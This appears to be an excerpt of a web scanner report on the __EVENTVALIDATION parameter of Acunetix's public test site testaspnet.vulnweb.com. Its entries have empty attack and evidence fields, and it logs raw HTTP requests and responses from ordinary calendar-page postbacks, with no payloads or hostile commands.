Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1065 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,065 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8380&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAECNpQrb2ghkZGS5e07Ng%2FJMbGy6p0Ab6LPKvtVgmA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLY%2BJ3HAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEDv2I6AZYM%2B8MRqkTcfKckGJWWJ
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:53 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAECNpQrb2ghkZGS5e07Ng/JMbGy6p0Ab6LPKvtVgmA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLY+J3HAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEDv2I6AZYM+8MRqkTcfKckGJWWJ" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:White" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8396&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAKUyd59oIZGRkQhxx2cQtgWTZdAwo4f7btbHttjw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLY5ffCDgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVXm6%2BMLVZINmqkquZAvsaEPGWcKA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:07 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAKUyd59oIZGRkQhxx2cQtgWTZdAwo4f7btbHttjw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLY5ffCDgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVXm6+MLVZINmqkquZAvsaEPGWcKA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:White" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
